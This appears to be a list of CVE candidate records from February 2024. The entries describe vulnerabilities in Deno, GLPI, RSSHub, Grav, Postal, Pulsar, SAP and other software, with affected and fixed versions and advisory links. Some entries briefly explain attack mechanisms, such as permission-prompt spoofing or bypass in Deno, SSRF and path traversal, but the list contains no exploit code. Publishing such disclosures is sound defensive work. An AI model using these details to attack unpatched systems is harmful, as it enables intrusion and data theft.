CVE 2024 27949 Candidate Server-Side Request Forgery (SSRF) vulnerability in sirv.Com Image Optimizer, Resizer and CDN – Sirv.This issue affects Image Optimizer, Resizer and CDN – Sirv: from n/a through 7.2.0. MISC:https://patchstack.com/database/vulnerability/sirv/wordpress-sirv-plugin-7-2-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/sirv/wordpress-sirv-plugin-7-2-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27948 Candidate Cross-Site Request Forgery (CSRF) vulnerability in bytesforall Atahualpa.This issue affects Atahualpa: from n/a through 3.7.24. MISC:https://patchstack.com/database/vulnerability/atahualpa/wordpress-atahualpa-theme-3-7-24-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/atahualpa/wordpress-atahualpa-theme-3-7-24-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240228)
CVE 2024 27938 Candidate Postal is an open source SMTP server. Postal versions less than 3.0.0 are vulnerable to SMTP Smuggling attacks which may allow incoming e-mails to be spoofed. This, in conjunction with a cooperative outgoing SMTP service, would allow for an incoming e-mail to be received by Postal addressed from a server that a user has 'authorised' to send mail on their behalf but were not the genuine author of the e-mail. Postal is not affected for sending outgoing e-mails as email is re-encoded with `<CR><LF>` line endings when transmitted over SMTP. This issue has been addressed and users should upgrade to Postal v3.0.0 or higher. Once upgraded, Postal will only accept End of DATA sequences which are explicitly `<CR><LF>.<CR><LF>`. If a non-compliant sequence is detected it will be logged to the SMTP server log. There are no workarounds for this issue. MISC:https://github.com/postalserver/postal/commit/0140dc4 | URL:https://github.com/postalserver/postal/commit/0140dc4 | MISC:https://github.com/postalserver/postal/security/advisories/GHSA-j42r-6c99-hqf2 | URL:https://github.com/postalserver/postal/security/advisories/GHSA-j42r-6c99-hqf2 | MISC:https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide | URL:https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide | MISC:https://www.postfix.org/smtp-smuggling.html | URL:https://www.postfix.org/smtp-smuggling.html Assigned (20240228)
CVE 2024 27937 Candidate GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An authenticated user can obtain the email address of all GLPI users. This issue has been patched in version 10.0.13. MISC:https://github.com/glpi-project/glpi/commit/d02c537d23cbb729fe18b87f71b3c6e84e9892da | URL:https://github.com/glpi-project/glpi/commit/d02c537d23cbb729fe18b87f71b3c6e84e9892da | MISC:https://github.com/glpi-project/glpi/releases/tag/10.0.13 | URL:https://github.com/glpi-project/glpi/releases/tag/10.0.13 | MISC:https://github.com/glpi-project/glpi/security/advisories/GHSA-98qw-hpg3-2hpj | URL:https://github.com/glpi-project/glpi/security/advisories/GHSA-98qw-hpg3-2hpj Assigned (20240228)
CVE 2024 27936 Candidate Deno is a JavaScript, TypeScript, and WebAssembly runtime with secure defaults. Starting in version 1.32.1 and prior to version 1.41 of the deno_runtime library, maliciously crafted permission request can show the spoofed permission prompt by inserting a broken ANSI escape sequence into the request contents. Deno is stripping any ANSI escape sequences from the permission prompt, but permissions given to the program are based on the contents that contain the ANSI escape sequences. Any Deno program can spoof the content of the interactive permission prompt by inserting a broken ANSI code, which allows a malicious Deno program to display the wrong file path or program name to the user. Version 1.41 of the deno_runtime library contains a patch for the issue. MISC:https://github.com/denoland/deno/commit/78d430103a8f6931154ddbbe19d36f3b8630286d | URL:https://github.com/denoland/deno/commit/78d430103a8f6931154ddbbe19d36f3b8630286d | MISC:https://github.com/denoland/deno/commit/7e6b94231290020b55f1d08fb03ea8132781abc5 | URL:https://github.com/denoland/deno/commit/7e6b94231290020b55f1d08fb03ea8132781abc5 | MISC:https://github.com/denoland/deno/security/advisories/GHSA-m4pq-fv2w-6hrw | URL:https://github.com/denoland/deno/security/advisories/GHSA-m4pq-fv2w-6hrw Assigned (20240228)
CVE 2024 27935 Candidate Deno is a JavaScript, TypeScript, and WebAssembly runtime. Starting in version 1.35.1 and prior to version 1.36.3, a vulnerability in Deno's Node.js compatibility runtime allows for cross-session data contamination during simultaneous asynchronous reads from Node.js streams sourced from sockets or files. The issue arises from the re-use of a global buffer (BUF) in stream_wrap.ts used as a performance optimization to limit allocations during these asynchronous read operations. This can lead to data intended for one session being received by another session, potentially resulting in data corruption and unexpected behavior. This affects all users of Deno that use the node.js compatibility layer for network communication or other streams, including packages that may require node.js libraries indirectly. Version 1.36.3 contains a patch for this issue. MISC:https://github.com/denoland/deno/commit/3e9fb8aafd9834ebacd27734cea4310caaf794c6 | URL:https://github.com/denoland/deno/commit/3e9fb8aafd9834ebacd27734cea4310caaf794c6 | MISC:https://github.com/denoland/deno/issues/20188 | URL:https://github.com/denoland/deno/issues/20188 | MISC:https://github.com/denoland/deno/security/advisories/GHSA-wrqv-pf6j-mqjp | URL:https://github.com/denoland/deno/security/advisories/GHSA-wrqv-pf6j-mqjp Assigned (20240228)
CVE 2024 27934 Candidate Deno is a JavaScript, TypeScript, and WebAssembly runtime. Starting in version 1.36.2 and prior to version 1.40.3, use of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, resulting in arbitrary code execution. Use of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, which is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions. This bug is known to be exploitable for both `*const c_void` and `ExternalPointer` implementations. Version 1.40.3 fixes this issue. MISC:https://github.com/denoland/deno/security/advisories/GHSA-3j27-563v-28wf | URL:https://github.com/denoland/deno/security/advisories/GHSA-3j27-563v-28wf Assigned (20240228)
CVE 2024 27933 Candidate Deno is a JavaScript, TypeScript, and WebAssembly runtime. In version 1.39.0, use of raw file descriptors in `op_node_ipc_pipe()` leads to premature close of arbitrary file descriptors, allowing standard input to be re-opened as a different resource resulting in permission prompt bypass. Node child_process IPC relies on the JS side to pass the raw IPC file descriptor to `op_node_ipc_pipe()`, which returns a `IpcJsonStreamResource` ID associated with the file descriptor. On closing the resource, the raw file descriptor is closed together. Use of raw file descriptors in `op_node_ipc_pipe()` leads to premature close of arbitrary file descriptors. This allow standard input (fd 0) to be closed and re-opened for a different resource, which allows a silent permission prompt bypass. This is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions. This bug is known to be exploitable. There is a working exploit that achieves arbitrary code execution by bypassing prompts from zero permissions, additionally abusing the fact that Cache API lacks filesystem permission checks. The attack can be conducted silently as stderr can also be closed, suppressing all prompt outputs. Version 1.39.1 fixes the bug. MISC:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L214 | URL:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L214 | MISC:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L220 | URL:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L220 | MISC:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L225 | URL:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L225 | MISC:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L241 | URL:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L241 | MISC:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L256 | URL:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L256 | MISC:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L265 | URL:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L265 | MISC:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L99 | URL:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L99 | MISC:https://github.com/denoland/deno/commit/55fac9f5ead6d30996400e8597c969b675c5a22b | URL:https://github.com/denoland/deno/commit/55fac9f5ead6d30996400e8597c969b675c5a22b | MISC:https://github.com/denoland/deno/commit/5a91a065b882215dde209baf626247e54c21a392 | URL:https://github.com/denoland/deno/commit/5a91a065b882215dde209baf626247e54c21a392 | MISC:https://github.com/denoland/deno/security/advisories/GHSA-6q4w-9x56-rmwq | URL:https://github.com/denoland/deno/security/advisories/GHSA-6q4w-9x56-rmwq Assigned (20240228)
CVE 2024 27932 Candidate Deno is a JavaScript, TypeScript, and WebAssembly runtime. Starting in version 1.8.0 and prior to version 1.40.4, Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for `example[.]com` may be sent to `notexample[.]com`. Anyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is affected. Version 1.40.0 contains a patch for this issue MISC:https://github.com/denoland/deno/blob/3f4639c330a31741b0efda2f93ebbb833f4f95bc/cli/auth_tokens.rs#L89 | URL:https://github.com/denoland/deno/blob/3f4639c330a31741b0efda2f93ebbb833f4f95bc/cli/auth_tokens.rs#L89 | MISC:https://github.com/denoland/deno/commit/de23e3b60b066481cc390f459497d5bef42a899b | URL:https://github.com/denoland/deno/commit/de23e3b60b066481cc390f459497d5bef42a899b | MISC:https://github.com/denoland/deno/security/advisories/GHSA-5frw-4rwq-xhcr | URL:https://github.com/denoland/deno/security/advisories/GHSA-5frw-4rwq-xhcr Assigned (20240228)
CVE 2024 27931 Candidate Deno is a JavaScript, TypeScript, and WebAssembly runtime with secure defaults. Insufficient validation of parameters in `Deno.makeTemp*` APIs would allow for creation of files outside of the allowed directories. This may allow the user to overwrite important files on the system that may affect other systems. A user may provide a prefix or suffix to a `Deno.makeTemp*` API containing path traversal characters. This is fixed in Deno 1.41.1. MISC:https://github.com/denoland/deno/security/advisories/GHSA-hrqr-jv8w-v9jh | URL:https://github.com/denoland/deno/security/advisories/GHSA-hrqr-jv8w-v9jh Assigned (20240228)
CVE 2024 27930 Candidate GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An authenticated user can access sensitive fields data from items on which he has read access. This issue has been patched in version 10.0.13. MISC:https://github.com/glpi-project/glpi/commit/1942b70b2422fff51822f6eb3af500c94760871e | URL:https://github.com/glpi-project/glpi/commit/1942b70b2422fff51822f6eb3af500c94760871e | MISC:https://github.com/glpi-project/glpi/releases/tag/10.0.13 | URL:https://github.com/glpi-project/glpi/releases/tag/10.0.13 | MISC:https://github.com/glpi-project/glpi/security/advisories/GHSA-82vv-j9pr-qmwq | URL:https://github.com/glpi-project/glpi/security/advisories/GHSA-82vv-j9pr-qmwq Assigned (20240228)
CVE 2024 27929 Candidate ImageSharp is a managed, cross-platform, 2D graphics library. A heap-use-after-free flaw was found in ImageSharp's InitializeImage() function of PngDecoderCore.cs file. This vulnerability is triggered when an attacker passes a specially crafted PNG image file to ImageSharp for conversion, potentially leading to information disclosure. This issue has been patched in versions 3.1.3 and 2.1.7. MISC:https://github.com/SixLabors/ImageSharp/security/advisories/GHSA-65x7-c272-7g7r | URL:https://github.com/SixLabors/ImageSharp/security/advisories/GHSA-65x7-c272-7g7r Assigned (20240228)
CVE 2024 27927 Candidate RSSHub is an open source RSS feed generator. Prior to version 1.0.0-master.a429472, RSSHub allows remote attackers to use the server as a proxy to send HTTP GET requests to arbitrary targets and retrieve information in the internal network or conduct Denial-of-Service (DoS) attacks. The attacker can send malicious requests to a RSSHub server, to make the server send HTTP GET requests to arbitrary destinations and see partial responses. This may lead to leak the server IP address, which could be hidden behind a CDN; retrieving information in the internal network, e.g. which addresses/ports are accessible, the titles and meta descriptions of HTML pages; and denial of service amplification. The attacker could request the server to download some large files, or chain several SSRF requests in a single attacker request. MISC:https://github.com/DIYgod/RSSHub/blob/172f6cfd2b69ea6affdbdedf61e6dde1671f3796/lib/routes/m4/index.js#L10-L14 | URL:https://github.com/DIYgod/RSSHub/blob/172f6cfd2b69ea6affdbdedf61e6dde1671f3796/lib/routes/m4/index.js#L10-L14 | MISC:https://github.com/DIYgod/RSSHub/blob/172f6cfd2b69ea6affdbdedf61e6dde1671f3796/lib/routes/zjol/paper.js#L7-L13 | URL:https://github.com/DIYgod/RSSHub/blob/172f6cfd2b69ea6affdbdedf61e6dde1671f3796/lib/routes/zjol/paper.js#L7-L13 | MISC:https://github.com/DIYgod/RSSHub/blob/5928c5db2472e101c2f5c3bafed77a2f72edd40a/lib/routes/mastodon/acct.js#L4-L7 | URL:https://github.com/DIYgod/RSSHub/blob/5928c5db2472e101c2f5c3bafed77a2f72edd40a/lib/routes/mastodon/acct.js#L4-L7 | MISC:https://github.com/DIYgod/RSSHub/blob/5928c5db2472e101c2f5c3bafed77a2f72edd40a/lib/routes/mastodon/utils.js#L85-L105 | URL:https://github.com/DIYgod/RSSHub/blob/5928c5db2472e101c2f5c3bafed77a2f72edd40a/lib/routes/mastodon/utils.js#L85-L105 | MISC:https://github.com/DIYgod/RSSHub/commit/a42947231104a9ec3436fc52cedb31740c9a7069 | URL:https://github.com/DIYgod/RSSHub/commit/a42947231104a9ec3436fc52cedb31740c9a7069 | MISC:https://github.com/DIYgod/RSSHub/security/advisories/GHSA-3p3p-cgj7-vgw3 | URL:https://github.com/DIYgod/RSSHub/security/advisories/GHSA-3p3p-cgj7-vgw3 Assigned (20240228)
CVE 2024 27926 Candidate RSSHub is an open source RSS feed generator. Starting in version 1.0.0-master.cbbd829 and prior to version 1.0.0-master.d8ca915, ahen the specially crafted image is supplied to the internal media proxy, it proxies the image without handling XSS vulnerabilities, allowing for the execution of arbitrary JavaScript code. Users who access the deliberately constructed URL are affected. This vulnerability was fixed in version 1.0.0-master.d8ca915. No known workarounds are available. MISC:https://github.com/DIYgod/RSSHub/commit/4d3e5d79c1c17837e931b4cd253d2013b487aa87 | URL:https://github.com/DIYgod/RSSHub/commit/4d3e5d79c1c17837e931b4cd253d2013b487aa87 | MISC:https://github.com/DIYgod/RSSHub/security/advisories/GHSA-2wqw-hr4f-xrhh | URL:https://github.com/DIYgod/RSSHub/security/advisories/GHSA-2wqw-hr4f-xrhh Assigned (20240228)
CVE 2024 27923 Candidate Grav is a content management system (CMS). Prior to version 1.7.43, users who may write a page may use the `frontmatter` feature due to insufficient permission validation and inadequate file name validation. This may lead to remote code execution. Version 1.7.43 fixes this issue. MISC:https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07 | URL:https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07 | MISC:https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v | URL:https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v Assigned (20240228)
CVE 2024 27922 Candidate TOMP Bare Server implements the TompHTTP bare server. A vulnerability in versions prior to 2.0.2 relates to insecure handling of HTTP requests by the @tomphttp/bare-server-node package. This flaw potentially exposes the users of the package to manipulation of their web traffic. The impact may vary depending on the specific usage of the package but it can potentially affect any system where this package is in use. The problem has been patched in version 2.0.2. As of time of publication, no specific workaround strategies have been disclosed. MISC:https://github.com/tomphttp/bare-server-node/security/advisories/GHSA-86fc-f9gr-v533 | URL:https://github.com/tomphttp/bare-server-node/security/advisories/GHSA-86fc-f9gr-v533 Assigned (20240228)
CVE 2024 27921 Candidate Grav is an open-source, flat-file content management system. A file upload path traversal vulnerability has been identified in the application prior to version 1.7.45, enabling attackers to replace or create files with extensions like .json, .zip, .css, .gif, etc. This critical security flaw poses severe risks, that can allow attackers to inject arbitrary code on the server, undermine integrity of backup files by overwriting existing files or creating new ones, and exfiltrate sensitive data using CSS exfiltration techniques. Upgrading to patched version 1.7.45 can mitigate the issue. MISC:https://github.com/getgrav/grav/commit/5928411b86bab05afca2b33db4e7386a44858e99 | URL:https://github.com/getgrav/grav/commit/5928411b86bab05afca2b33db4e7386a44858e99 | MISC:https://github.com/getgrav/grav/security/advisories/GHSA-m7hx-hw6h-mqmc | URL:https://github.com/getgrav/grav/security/advisories/GHSA-m7hx-hw6h-mqmc Assigned (20240228)
CVE 2024 27920 Candidate projectdiscovery/nuclei is a fast and customisable vulnerability scanner based on simple YAML based DSL. A significant security oversight was identified in Nuclei v3, involving the execution of unsigned code templates through workflows. This vulnerability specifically affects users utilizing custom workflows, potentially allowing the execution of malicious code on the user's system. This advisory outlines the impacted users, provides details on the security patch, and suggests mitigation strategies. The vulnerability is addressed in Nuclei v3.2.0. Users are strongly recommended to update to this version to mitigate the security risk. Users should refrain from using custom workflows if unable to upgrade immediately. Only trusted, verified workflows should be executed. MISC:https://docs.projectdiscovery.io/templates/protocols/code | URL:https://docs.projectdiscovery.io/templates/protocols/code | MISC:https://docs.projectdiscovery.io/templates/reference/template-signing | URL:https://docs.projectdiscovery.io/templates/reference/template-signing | MISC:https://docs.projectdiscovery.io/templates/workflows/overview | URL:https://docs.projectdiscovery.io/templates/workflows/overview | MISC:https://github.com/projectdiscovery/nuclei/pull/4822 | URL:https://github.com/projectdiscovery/nuclei/pull/4822 | MISC:https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-w5wx-6g2r-r78q | URL:https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-w5wx-6g2r-r78q Assigned (20240228)
CVE 2024 27918 Candidate Coder allows oragnizations to provision remote development environments via Terraform. Prior to versions 2.6.1, 2.7.3, and 2.8.4, a vulnerability in Coder's OIDC authentication could allow an attacker to bypass the `CODER_OIDC_EMAIL_DOMAIN` verification and create an account with an email not in the allowlist. Deployments are only affected if the OIDC provider allows users to create accounts on the provider. During OIDC registration, the user's email was improperly validated against the allowed `CODER_OIDC_EMAIL_DOMAIN`s. This could allow a user with a domain that only partially matched an allowed domain to successfully login or register. An attacker could register a domain name that exploited this vulnerability and register on a Coder instance with a public OIDC provider. Coder instances with OIDC enabled and protected by the `CODER_OIDC_EMAIL_DOMAIN` configuration are affected. Coder instances using a private OIDC provider are not affected, as arbitrary users cannot register through a private OIDC provider without first having an account on the provider. Public OIDC providers are impacted. GitHub authentication and external authentication are not impacted. This vulnerability is remedied in versions 2.8.4, 2.7.3, and 2.6.1 All versions prior to these patches are affected by the vulnerability.*It is recommended that customers upgrade their deployments as soon as possible if they are utilizing OIDC authentication with the `CODER_OIDC_EMAIL_DOMAIN` setting. MISC:https://github.com/coder/coder/commit/1171ce7add017481d28441575024209ac160ecb0 | URL:https://github.com/coder/coder/commit/1171ce7add017481d28441575024209ac160ecb0 | MISC:https://github.com/coder/coder/commit/2ba84911f8b02605e5958d5e4a2fe3979ec50b31 | URL:https://github.com/coder/coder/commit/2ba84911f8b02605e5958d5e4a2fe3979ec50b31 | MISC:https://github.com/coder/coder/commit/2d37eb42e7db656e343fe1f36de5ab1a1a62f4fb | URL:https://github.com/coder/coder/commit/2d37eb42e7db656e343fe1f36de5ab1a1a62f4fb | MISC:https://github.com/coder/coder/commit/4439a920e454a82565e445e4376c669e3b89591c | URL:https://github.com/coder/coder/commit/4439a920e454a82565e445e4376c669e3b89591c | MISC:https://github.com/coder/coder/security/advisories/GHSA-7cc2-r658-7xpf | URL:https://github.com/coder/coder/security/advisories/GHSA-7cc2-r658-7xpf Assigned (20240228)
CVE 2024 27917 Candidate Shopware is an open commerce platform based on Symfony Framework and Vue. The Symfony Session Handler pops the Session Cookie and assigns it to the Response. Since Shopware 6.5.8.0, the 404 pages are cached to improve the performance of 404 pages. So the cached Response which contains a Session Cookie when the Browser accessing the 404 page, has no cookies yet. The Symfony Session Handler is in use, when no explicit Session configuration has been done. When Redis is in use for Sessions using the PHP Redis extension, this exploiting code is not used. Shopware version 6.5.8.7 contains a patch for this issue. As a workaround, use Redis for Sessions, as this does not trigger the exploit code. MISC:https://github.com/shopware/shopware/commit/7d9cb03225efca5f97e69b800d8747598dd15ce3 | URL:https://github.com/shopware/shopware/commit/7d9cb03225efca5f97e69b800d8747598dd15ce3 | MISC:https://github.com/shopware/shopware/releases/tag/v6.5.8.7 | URL:https://github.com/shopware/shopware/releases/tag/v6.5.8.7 | MISC:https://github.com/shopware/shopware/security/advisories/GHSA-c2f9-4jmm-v45m | URL:https://github.com/shopware/shopware/security/advisories/GHSA-c2f9-4jmm-v45m | MISC:https://github.com/shopware/storefront/commit/3477e4a425d3c54b4bfae82d703fe3838dc21d3e | URL:https://github.com/shopware/storefront/commit/3477e4a425d3c54b4bfae82d703fe3838dc21d3e Assigned (20240228)
CVE 2024 27916 Candidate Minder is a software supply chain security platform. Prior to version 0.0.33, a Minder user can use the endpoints `GetRepositoryByName`, `DeleteRepositoryByName`, and `GetArtifactByName` to access any repository in the database, irrespective of who owns the repo and any permissions present. The database query checks by repo owner, repo name and provider name (which is always `github`). These query values are not distinct for the particular user - as long as the user has valid credentials and a provider, they can set the repo owner/name to any value they want and the server will return information on this repo. Version 0.0.33 contains a patch for this issue. MISC:https://github.com/stacklok/minder/blob/a115c8524fbd582b2b277eaadce024bebbded508/internal/controlplane/handlers_repositories.go#L277-L278 | URL:https://github.com/stacklok/minder/blob/a115c8524fbd582b2b277eaadce024bebbded508/internal/controlplane/handlers_repositories.go#L277-L278 | MISC:https://github.com/stacklok/minder/blob/main/internal/controlplane/handlers_repositories.go#L257-L299 | URL:https://github.com/stacklok/minder/blob/main/internal/controlplane/handlers_repositories.go#L257-L299 | MISC:https://github.com/stacklok/minder/commit/45750b4e9fb2de33365758366e06c19e999bd2eb | URL:https://github.com/stacklok/minder/commit/45750b4e9fb2de33365758366e06c19e999bd2eb | MISC:https://github.com/stacklok/minder/security/advisories/GHSA-v627-69v2-xx37 | URL:https://github.com/stacklok/minder/security/advisories/GHSA-v627-69v2-xx37 Assigned (20240228)
CVE 2024 27915 Candidate Sulu is a PHP content management system. Starting in verson 2.2.0 and prior to version 2.4.17 and 2.5.13, access to pages is granted regardless of role permissions for webspaces which have a security system configured and permission check enabled. Webspaces without do not have this issue. The problem is patched in versions 2.4.17 and 2.5.13. Some workarounds are available. One may apply the patch to `vendor/symfony/security-http/HttpUtils.php` manually or avoid installing `symfony/security-http` versions greater equal than `v5.4.30` or `v6.3.6`. MISC:https://github.com/sulu/sulu/commit/ec9c3f99e15336dc4f6877f512300f231c17c6da | URL:https://github.com/sulu/sulu/commit/ec9c3f99e15336dc4f6877f512300f231c17c6da | MISC:https://github.com/sulu/sulu/security/advisories/GHSA-jr83-m233-gg6p | URL:https://github.com/sulu/sulu/security/advisories/GHSA-jr83-m233-gg6p Assigned (20240228)
CVE 2024 27914 Candidate GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An unauthenticated user can provide a malicious link to a GLPI administrator in order to exploit a reflected XSS vulnerability. The XSS will only trigger if the administrator navigates through the debug bar. This issue has been patched in version 10.0.13. MISC:https://github.com/glpi-project/glpi/commit/69e0dee8de0c0df139b42dbfa1a8997888c2af95 | URL:https://github.com/glpi-project/glpi/commit/69e0dee8de0c0df139b42dbfa1a8997888c2af95 | MISC:https://github.com/glpi-project/glpi/releases/tag/10.0.13 | URL:https://github.com/glpi-project/glpi/releases/tag/10.0.13 | MISC:https://github.com/glpi-project/glpi/security/advisories/GHSA-rcxj-fqr4-q34r | URL:https://github.com/glpi-project/glpi/security/advisories/GHSA-rcxj-fqr4-q34r Assigned (20240228)
CVE 2024 27913 Candidate ospf_te_parse_te in ospfd/ospf_te.c in FRRouting (FRR) through 9.1 allows remote attackers to cause a denial of service (ospfd daemon crash) via a malformed OSPF LSA packet, because of an attempted access to a missing attribute field. MISC:https://github.com/FRRouting/frr/pull/15431 Assigned (20240228)
CVE 2024 27907 Candidate A vulnerability has been identified in Simcenter Femap (All versions < V2306.0000). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted Catia MODEL file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-22051) MISC:https://cert-portal.siemens.com/productcert/html/ssa-000072.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-000072.html Assigned (20240227)
CVE 2024 27906 Candidate Apache Airflow, versions before 2.8.2, has a vulnerability that allows authenticated users to view DAG code and import errors of DAGs they do not have permission to view through the API and the UI. Users of Apache Airflow are recommended to upgrade to version 2.8.2 or newer to mitigate the risk associated with this vulnerability MISC:https://github.com/apache/airflow/pull/37290 | URL:https://github.com/apache/airflow/pull/37290 | MISC:https://github.com/apache/airflow/pull/37468 | URL:https://github.com/apache/airflow/pull/37468 | MISC:https://lists.apache.org/thread/on4f7t5sqr3vfgp1pvkck79wv7mq9st5 | URL:https://lists.apache.org/thread/on4f7t5sqr3vfgp1pvkck79wv7mq9st5 | MLIST:[oss-security] 20240229 CVE-2024-27906: Apache Airflow: Dag Code and Import Error Permissions Ignored | URL:http://www.openwall.com/lists/oss-security/2024/02/29/1 Assigned (20240227)
CVE 2024 27905 Candidate ** UNSUPPORTED WHEN ASSIGNED ** Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Aurora. An endpoint exposing internals to unauthenticated users can be used as a "padding oracle" allowing an anonymous attacker to construct a valid authentication cookie. Potentially this could be combined with vulnerabilities in other components to achieve remote code execution. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. MISC:https://lists.apache.org/thread/564kbv3wqdzkscmdn2bg4vlk48qymryp | URL:https://lists.apache.org/thread/564kbv3wqdzkscmdn2bg4vlk48qymryp | MLIST:[oss-security] 20240227 CVE-2024-27905: Apache Aurora: padding oracle can allow construction an authentication cookie | URL:http://www.openwall.com/lists/oss-security/2024/02/27/3 Assigned (20240227)
CVE 2024 27902 Candidate Applications based on SAP GUI for HTML in SAP NetWeaver AS ABAP - versions 7.89, 7.93, do not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. A successful attack can allow a malicious attacker to access and modify data through their ability to execute code in a user’s browser. There is no impact on the availability of the system MISC:https://me.sap.com/notes/3377979 | URL:https://me.sap.com/notes/3377979 | MISC:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364 | URL:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364 Assigned (20240227)
CVE 2024 27900 Candidate Due to missing authorization check, attacker with business user account in SAP ABAP Platform - version 758, 795, can change the privacy setting of job templates from shared to private. As a result, the selected template would only be accessible to the owner. MISC:https://me.sap.com/notes/3419022 | URL:https://me.sap.com/notes/3419022 | MISC:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364 | URL:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364 Assigned (20240227)
CVE 2024 27894 Candidate The Pulsar Functions Worker includes a capability that permits authenticated users to create functions where the function's implementation is referenced by a URL. The supported URL schemes include "file", "http", and "https". When a function is created using this method, the Functions Worker will retrieve the implementation from the URL provided by the user. However, this feature introduces a vulnerability that can be exploited by an attacker to gain unauthorized access to any file that the Pulsar Functions Worker process has permissions to read. This includes reading the process environment which potentially includes sensitive information, such as secrets. Furthermore, an attacker could leverage this vulnerability to use the Pulsar Functions Worker as a proxy to access the content of remote HTTP and HTTPS endpoint URLs. This could also be used to carry out denial of service attacks. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. The updated versions of Pulsar Functions Worker will, by default, impose restrictions on the creation of functions using URLs. For users who rely on this functionality, the Function Worker configuration provides two configuration keys: "additionalEnabledConnectorUrlPatterns" and "additionalEnabledFunctionsUrlPatterns". These keys allow users to specify a set of URL patterns that are permitted, enabling the creation of functions using URLs that match the defined patterns. This approach ensures that the feature remains available to those who require it, while limiting the potential for unauthorized access and exploitation. MISC:https://lists.apache.org/thread/45cqhgqg8d19ongjw18ypcss8vwh206p | URL:https://lists.apache.org/thread/45cqhgqg8d19ongjw18ypcss8vwh206p | MISC:https://pulsar.apache.org/security/CVE-2024-27894/ | URL:https://pulsar.apache.org/security/CVE-2024-27894/ Assigned (20240226)
CVE 2024 27889 Candidate Multiple SQL Injection vulnerabilities exist in the reporting application of the Arista Edge Threat Management - Arista NG Firewall (NGFW). A user with advanced report application access rights can exploit the SQL injection, allowing them to execute commands on the underlying operating system with elevated privileges. MISC:https://https://www.arista.com/en/support/advisories-notices/security-advisory/19038-security-advisory-0093 | URL:https://https://www.arista.com/en/support/advisories-notices/security-advisory/19038-security-advisory-0093 Assigned (20240226)
